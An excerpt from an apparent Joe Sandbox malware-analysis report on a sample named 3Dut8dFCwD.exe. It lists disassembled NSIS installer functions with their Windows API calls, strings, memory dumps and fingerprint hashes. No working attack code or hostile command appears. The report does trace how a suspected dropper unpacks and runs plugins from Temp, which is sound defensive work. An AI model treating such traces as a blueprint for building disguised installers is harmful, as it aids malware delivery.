Part of subcall function 00406928: GetModuleHandleA.KERNEL32(?,00000020,?,0040361F,0000000C,?,?,?,?,?,?,?,?), ref: 0040693A
Part of subcall function 00406928: GetProcAddress.KERNEL32(00000000,?), ref: 00406955

GetUserDefaultUILanguage.KERNELBASE(00000002,75923420,C:\Users\user\AppData\Local\Temp\,00000000,007B3000,00008001), ref: 00403C20

Part of subcall function 0040647B: wsprintfW.USER32 ref: 00406488

lstrcatW.KERNEL32(1033,007A1748), ref: 00403C87
lstrlenW.KERNEL32(007A6200,?,?,?,007A6200,00000000,007B3800,1033,007A1748,80000001,Control Panel\Desktop\ResourceLocale,00000000,007A1748,00000000,00000002,75923420), ref: 00403D07
lstrcmpiW.KERNEL32(007A61F8,.exe,007A6200,?,?,?,007A6200,00000000,007B3800,1033,007A1748,80000001,Control Panel\Desktop\ResourceLocale,00000000,007A1748,00000000), ref: 00403D1A
GetFileAttributesW.KERNEL32(007A6200), ref: 00403D25
LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,007B3800), ref: 00403D6E
RegisterClassW.USER32(007A7200), ref: 00403DAB
SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403DC3
CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403DF8
ShowWindow.USER32(00000005,00000000), ref: 00403E2E
GetClassInfoW.USER32(00000000,RichEdit20W,007A7200), ref: 00403E5A
GetClassInfoW.USER32(00000000,RichEdit,007A7200), ref: 00403E67
RegisterClassW.USER32(007A7200), ref: 00403E70
DialogBoxParamW.USER32(?,00000000,00403FB4,00000000), ref: 00403E8F

Strings

RichEd20, xrefs: 00403E34
.DEFAULT\Control Panel\International, xrefs: 00403C72
RichEd32, xrefs: 00403E42
1033, xrefs: 00403C26, 00403C82
RichEdit, xrefs: 00403E61
Control Panel\Desktop\ResourceLocale, xrefs: 00403C3A
.exe, xrefs: 00403D14
C:\Users\user\AppData\Local\Temp\, xrefs: 00403C0B
_Nb, xrefs: 00403D8A, 00403DF2
RichEdit20W, xrefs: 00403E52, 00403E58

Memory Dump Source

Source File: 00000000.00000002.2215265119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2215211662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215333188.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215426032.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215426032.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215426032.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215426032.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215426032.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215426032.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2217425069.00000000007E0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3Dut8dFCwD.jbxd

Similarity

API ID: Class$Info$RegisterWindow$AddressAttributesCreateDefaultDialogFileHandleImageLanguageLoadModuleParamParametersProcShowSystemUserlstrcatlstrcmpilstrlenwsprintf
String ID: .DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
API String ID: 606308-1629884446
Opcode ID: 77247c40459340d7e507679bbfe1089da7311cd67a308f54977d61676674234e
Instruction ID: e3f36f251999893233d50a16806d3669fe4950a37a4839b1d492828efc6e8aed
Opcode Fuzzy Hash: 77247c40459340d7e507679bbfe1089da7311cd67a308f54977d61676674234e
Instruction Fuzzy Hash: 3061C470100600AAE720AF66DD45F2B3AACFB85B49F40453EF951B62E2DB7C9901CB6D

Function 00403082 Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 181
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 00403093
GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\3Dut8dFCwD.exe,00000400), ref: 004030AF

Part of subcall function 00406024: GetFileAttributesW.KERNELBASE(00000003,004030C2,C:\Users\user\Desktop\3Dut8dFCwD.exe,80000000,00000003), ref: 00406028
Part of subcall function 00406024: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 0040604A

GetFileSize.KERNEL32(00000000,00000000,007B7000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\3Dut8dFCwD.exe,C:\Users\user\Desktop\3Dut8dFCwD.exe,80000000,00000003), ref: 004030FB
GlobalAlloc.KERNELBASE(00000040,?), ref: 00403231

Strings

C:\Users\user\Desktop\3Dut8dFCwD.exe, xrefs: 00403099, 004030A8, 004030BC, 004030DC
C:\Users\user\Desktop, xrefs: 004030DD, 004030E2, 004030E8
Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 00403258
soft, xrefs: 00403170
C:\Users\user\AppData\Local\Temp\, xrefs: 00403089
Null, xrefs: 00403179
Error launching installer, xrefs: 004030D2
Inst, xrefs: 00403167

Memory Dump Source

Source File: 00000000.00000002.2215265119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2215211662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215333188.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215426032.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215426032.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215426032.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215426032.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215426032.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215426032.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2217425069.00000000007E0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3Dut8dFCwD.jbxd

Similarity

API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\3Dut8dFCwD.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
API String ID: 2803837635-3269453103
Opcode ID: 029ff5bc40cb25e8da3d427d571e525ea6566d1fbc352909608cbeb369897a4a
Instruction ID: 635ab88c792e9e5f97a92d6c795dead4e0d31dcfeb410e4bc66b7a0500b41a5f
Opcode Fuzzy Hash: 029ff5bc40cb25e8da3d427d571e525ea6566d1fbc352909608cbeb369897a4a
Instruction Fuzzy Hash: DB51D371A01204AFDB109F65DD41BAE7EACEB49716F20817BF900B62D1CA7C9F408B5D

Function 00401774 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 145
stringtimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrcatW.KERNEL32(00000000,00000000), ref: 004017B5
CompareFileTime.KERNEL32(-00000014,?,10.0.19045.False,10.0.19045.False,00000000,00000000,10.0.19045.False,C:\Users\user\AppData\Local\Temp\nsm4D39.tmp,?,?,00000031), ref: 004017DA

Part of subcall function 00406534: lstrcpynW.KERNEL32(?,?,00000400,00403681,007A7260,NSIS Error,?,00000008,0000000A,0000000C), ref: 00406541

Part of subcall function 004055B9: lstrlenW.KERNEL32(007A0728,00000000,00798F00,759223A0,?,?,?,?,?,?,?,?,?,004033FA,00000000,?), ref: 004055F1
Part of subcall function 004055B9: lstrlenW.KERNEL32(004033FA,007A0728,00000000,00798F00,759223A0,?,?,?,?,?,?,?,?,?,004033FA,00000000), ref: 00405601
Part of subcall function 004055B9: lstrcatW.KERNEL32(007A0728,004033FA), ref: 00405614
Part of subcall function 004055B9: SetWindowTextW.USER32(007A0728,007A0728), ref: 00405626
Part of subcall function 004055B9: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040564C
Part of subcall function 004055B9: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405666
Part of subcall function 004055B9: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405674

Strings

C:\Users\user\AppData\Local\Temp\nsm4D39.tmp, xrefs: 004017A3
10.0.19045.False, xrefs: 00401792, 0040179B, 004017A8, 004017BA, 004017C6, 004017FC, 00401812, 00401830, 0040186C, 004018ED, 004018F6, 00401900, 0040190B
C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\nsExec.dll, xrefs: 0040183A, 00401856

Memory Dump Source

Source File: 00000000.00000002.2215265119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2215211662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215333188.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215426032.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215426032.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215426032.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215426032.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215426032.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215426032.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2217425069.00000000007E0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3Dut8dFCwD.jbxd

Similarity

API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
String ID: 10.0.19045.False$C:\Users\user\AppData\Local\Temp\nsm4D39.tmp$C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\nsExec.dll
API String ID: 1941528284-2711164482
Opcode ID: 3ffec5e2436a6f5f0568e9a34f5becda87af7bfd853d8b16926dfd401e8784ff
Instruction ID: f453ba81f7058b6188de9b36fe697e27c0e04e304a513fa9e8a23dac1ec640eb
Opcode Fuzzy Hash: 3ffec5e2436a6f5f0568e9a34f5becda87af7bfd853d8b16926dfd401e8784ff
Instruction Fuzzy Hash: C741C631800518BACF11BBB9DC85DBE3AB5EF41729B21423FF012B10E2DB3C8A51966D

Function 004032B9 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 161
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 00403323
GetTickCount.KERNEL32 ref: 004033A7
MulDiv.KERNEL32(7FFFFFFF,00000064,?), ref: 004033D0
wsprintfW.USER32 ref: 004033E3

Strings

... %d%%, xrefs: 004033DD

Memory Dump Source

Source File: 00000000.00000002.2215265119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2215211662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215333188.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215426032.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215426032.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215426032.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215426032.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215426032.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215426032.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2217425069.00000000007E0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3Dut8dFCwD.jbxd

Similarity

API ID: CountTick$wsprintf
String ID: ... %d%%
API String ID: 551687249-2449383134
Opcode ID: 35df2eeb44d66dae63b1d0c24c026509dc1c2a142cef09f029ae2f44a6fc0423
Instruction ID: 8b929f0044e1ac0cacba81bf46ea48fcc998b80fd55e06c59bd949555b0c30d1
Opcode Fuzzy Hash: 35df2eeb44d66dae63b1d0c24c026509dc1c2a142cef09f029ae2f44a6fc0423
Instruction Fuzzy Hash: E5515F71900219DBCF11CF95D98469F7FA8AF4076AF14417BE804BB2C0C77C9A50CBAA

Function 004068B8 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 36
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004068CF
wsprintfW.USER32 ref: 0040690A
LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 0040691E

Strings

%s%S.dll, xrefs: 00406904
UXTHEME, xrefs: 004068C1

Memory Dump Source

Source File: 00000000.00000002.2215265119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2215211662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215333188.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215426032.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215426032.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215426032.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215426032.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215426032.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215426032.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2217425069.00000000007E0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3Dut8dFCwD.jbxd

Similarity

API ID: DirectoryLibraryLoadSystemwsprintf
String ID: %s%S.dll$UXTHEME
API String ID: 2200240437-1106614640
Opcode ID: 7a73cbb44207cafadb11ab8eaaa41fd963bfa172cfc882b2dd9c54e233860d96
Instruction ID: 81ed32cd441a27d4f3f8ebc13d3c3c121413d11d2ad97d4a1e4b49bf3134d0f2
Opcode Fuzzy Hash: 7a73cbb44207cafadb11ab8eaaa41fd963bfa172cfc882b2dd9c54e233860d96
Instruction Fuzzy Hash: 64F0FC31501219AACB10BB64DD0DF9B375C9B00305F10847AA646F10D0EB78D668C798

Function 00405F0B Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 47
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00406534: lstrcpynW.KERNEL32(?,?,00000400,00403681,007A7260,NSIS Error,?,00000008,0000000A,0000000C), ref: 00406541

Part of subcall function 00405EAE: CharNextW.USER32(?,?,007A3F50,?,00405F22,007A3F50,007A3F50,75923420,?,C:\Users\user\AppData\Local\Temp\,00405C60,?,75923420,C:\Users\user\AppData\Local\Temp\,007B3000), ref: 00405EBC
Part of subcall function 00405EAE: CharNextW.USER32(00000000), ref: 00405EC1
Part of subcall function 00405EAE: CharNextW.USER32(00000000), ref: 00405ED9

lstrlenW.KERNEL32(007A3F50,00000000,007A3F50,007A3F50,75923420,?,C:\Users\user\AppData\Local\Temp\,00405C60,?,75923420,C:\Users\user\AppData\Local\Temp\,007B3000), ref: 00405F64
GetFileAttributesW.KERNELBASE(007A3F50,007A3F50,007A3F50,007A3F50,007A3F50,007A3F50,00000000,007A3F50,007A3F50,75923420,?,C:\Users\user\AppData\Local\Temp\,00405C60,?,75923420,C:\Users\user\AppData\Local\Temp\), ref: 00405F74

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00405F0B
P?z, xrefs: 00405F11

Memory Dump Source

Source File: 00000000.00000002.2215265119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2215211662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215333188.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215426032.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215426032.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215426032.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215426032.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215426032.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215426032.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2217425069.00000000007E0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3Dut8dFCwD.jbxd

Similarity

API ID: CharNext$AttributesFilelstrcpynlstrlen
String ID: C:\Users\user\AppData\Local\Temp\$P?z
API String ID: 3248276644-4211009014
Opcode ID: bcbf200ecc0ebcd9a110e0aedcb8263399075ff3aca88ce7f3d60eb64f48f27a
Instruction ID: 4254dd577ef462a113b6af6603d7003c895b553eaebd6861c82524aaccd31353
Opcode Fuzzy Hash: bcbf200ecc0ebcd9a110e0aedcb8263399075ff3aca88ce7f3d60eb64f48f27a
Instruction Fuzzy Hash: 12F02835105E5329D622333A6C05AAF1544CFC6368719067BF892B22D5CF3C8B438CBE

Function 00406053 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 37
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 00406071
GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00000000,0040350D,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037F9), ref: 0040608C

Strings

nsa, xrefs: 00406060
C:\Users\user\AppData\Local\Temp\, xrefs: 00406058

Memory Dump Source

Source File: 00000000.00000002.2215265119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2215211662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215333188.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215426032.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215426032.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215426032.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215426032.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215426032.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215426032.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2217425069.00000000007E0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3Dut8dFCwD.jbxd

Similarity

API ID: CountFileNameTempTick
String ID: C:\Users\user\AppData\Local\Temp\$nsa
API String ID: 1716503409-44229769
Opcode ID: 017de5c5da22b1c6cf72d7a8a287ef2c48f88e3ac937424cf3c6df762bd8e462
Instruction ID: c38105da250e7271fccf8508e97940083eab768234b1f6861d150eb6f31dd2f1
Opcode Fuzzy Hash: 017de5c5da22b1c6cf72d7a8a287ef2c48f88e3ac937424cf3c6df762bd8e462
Instruction Fuzzy Hash: 27F09076B40204BBEB00CF69ED05F9EB7ACEB95750F11803AFA01F7180E6B0A9548768

Function 004015C6 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00405EAE: CharNextW.USER32(?,?,007A3F50,?,00405F22,007A3F50,007A3F50,75923420,?,C:\Users\user\AppData\Local\Temp\,00405C60,?,75923420,C:\Users\user\AppData\Local\Temp\,007B3000), ref: 00405EBC
Part of subcall function 00405EAE: CharNextW.USER32(00000000), ref: 00405EC1
Part of subcall function 00405EAE: CharNextW.USER32(00000000), ref: 00405ED9

GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040161F

Part of subcall function 00405A88: CreateDirectoryW.KERNELBASE(007AB800,?), ref: 00405ACA

SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Local\Temp\nsm4D39.tmp,?,00000000,000000F0), ref: 00401652

Strings

C:\Users\user\AppData\Local\Temp\nsm4D39.tmp, xrefs: 00401645

Memory Dump Source

Source File: 00000000.00000002.2215265119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2215211662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215333188.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215426032.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215426032.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215426032.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215426032.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215426032.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215426032.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2217425069.00000000007E0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3Dut8dFCwD.jbxd

Similarity

API ID: CharNext$Directory$AttributesCreateCurrentFile
String ID: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp
API String ID: 1892508949-1064468493
Opcode ID: 4c19b764ac487a517b4bd13167095bd853d569a08c8d607eac6b17a03d538d9d
Instruction ID: 625a4e517e3d2ef51acfe74bc6df62a7a1d29dad7f850d028ad858b28003b980
Opcode Fuzzy Hash: 4c19b764ac487a517b4bd13167095bd853d569a08c8d607eac6b17a03d538d9d
Instruction Fuzzy Hash: 3611D031504114ABCF206FA5CD405AF36A0EF04368B29493FE945B22F1DA3D4A819B4E

Function 004020DD Relevance: 4.6, APIs: 3, Instructions: 73
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNELBASE(00000000,00000001,000000F0), ref: 00402108

Part of subcall function 004055B9: lstrlenW.KERNEL32(007A0728,00000000,00798F00,759223A0,?,?,?,?,?,?,?,?,?,004033FA,00000000,?), ref: 004055F1
Part of subcall function 004055B9: lstrlenW.KERNEL32(004033FA,007A0728,00000000,00798F00,759223A0,?,?,?,?,?,?,?,?,?,004033FA,00000000), ref: 00405601
Part of subcall function 004055B9: lstrcatW.KERNEL32(007A0728,004033FA), ref: 00405614
Part of subcall function 004055B9: SetWindowTextW.USER32(007A0728,007A0728), ref: 00405626
Part of subcall function 004055B9: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040564C
Part of subcall function 004055B9: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405666
Part of subcall function 004055B9: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405674

LoadLibraryExW.KERNELBASE(00000000,?,00000008,00000001,000000F0), ref: 00402119
FreeLibrary.KERNELBASE(?,?,000000F7,?,?,?,?,00000008,00000001,000000F0), ref: 00402196

Memory Dump Source

Source File: 00000000.00000002.2215265119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2215211662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215333188.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215426032.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215426032.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215426032.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215426032.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215426032.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215426032.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2217425069.00000000007E0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3Dut8dFCwD.jbxd

Similarity

API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
String ID:
API String ID: 334405425-0
Opcode ID: ccfc87da9fdcbdf16f26fe9f90524ed476b134ac267b0d15e4dc6efb72c1dd6b
Instruction ID: 536d658b2d5626a072540831630168b43a4966d71debd26089b563c1caab560b
Opcode Fuzzy Hash: ccfc87da9fdcbdf16f26fe9f90524ed476b134ac267b0d15e4dc6efb72c1dd6b
Instruction Fuzzy Hash: 4321B031904108EADF11AFA4CE49A9D7A71BF84358F20423FF201B91E1CBBD8982961E

Function 00401BA0 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 72
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GlobalFree.KERNEL32(00AE25E0), ref: 00401C10
GlobalAlloc.KERNELBASE(00000040,00000804), ref: 00401C22

Strings

10.0.19045.False, xrefs: 00401BC7, 00401BCD, 00401BE7

Memory Dump Source

Source File: 00000000.00000002.2215265119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2215211662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215333188.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215426032.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215426032.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215426032.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215426032.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215426032.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215426032.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2217425069.00000000007E0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3Dut8dFCwD.jbxd

Similarity

API ID: Global$AllocFree
String ID: 10.0.19045.False
API String ID: 3394109436-2006975710
Opcode ID: a35846d0fa1f5f62d1cc44f85dbd038e6f418717e16ba0fa97b0d6e40a5ea598
Instruction ID: ebda21c3d1e0d5701a49ae815e8da7541a6b67fff49d9363c78ae17fdfc2c87a
Opcode Fuzzy Hash: a35846d0fa1f5f62d1cc44f85dbd038e6f418717e16ba0fa97b0d6e40a5ea598
Instruction Fuzzy Hash: 0D21C973904114EBDB20EBA8EE85A5E72F4AB04324755053FF542B72D0C67CD8418F5D

Function 00405BF8 Relevance: 4.5, APIs: 3, Instructions: 28
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00405FFF: GetFileAttributesW.KERNELBASE(?,?,00405C04,?,?,00000000,00405DDA,?,?,?,?), ref: 00406004
Part of subcall function 00405FFF: SetFileAttributesW.KERNELBASE(?,00000000), ref: 00406018

RemoveDirectoryW.KERNELBASE(?,?,?,00000000,00405DDA), ref: 00405C13
DeleteFileW.KERNELBASE(?,?,?,00000000,00405DDA), ref: 00405C1B
SetFileAttributesW.KERNEL32(?,00000000), ref: 00405C33

Memory Dump Source

Source File: 00000000.00000002.2215265119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2215211662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215333188.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215426032.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215426032.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215426032.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215426032.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
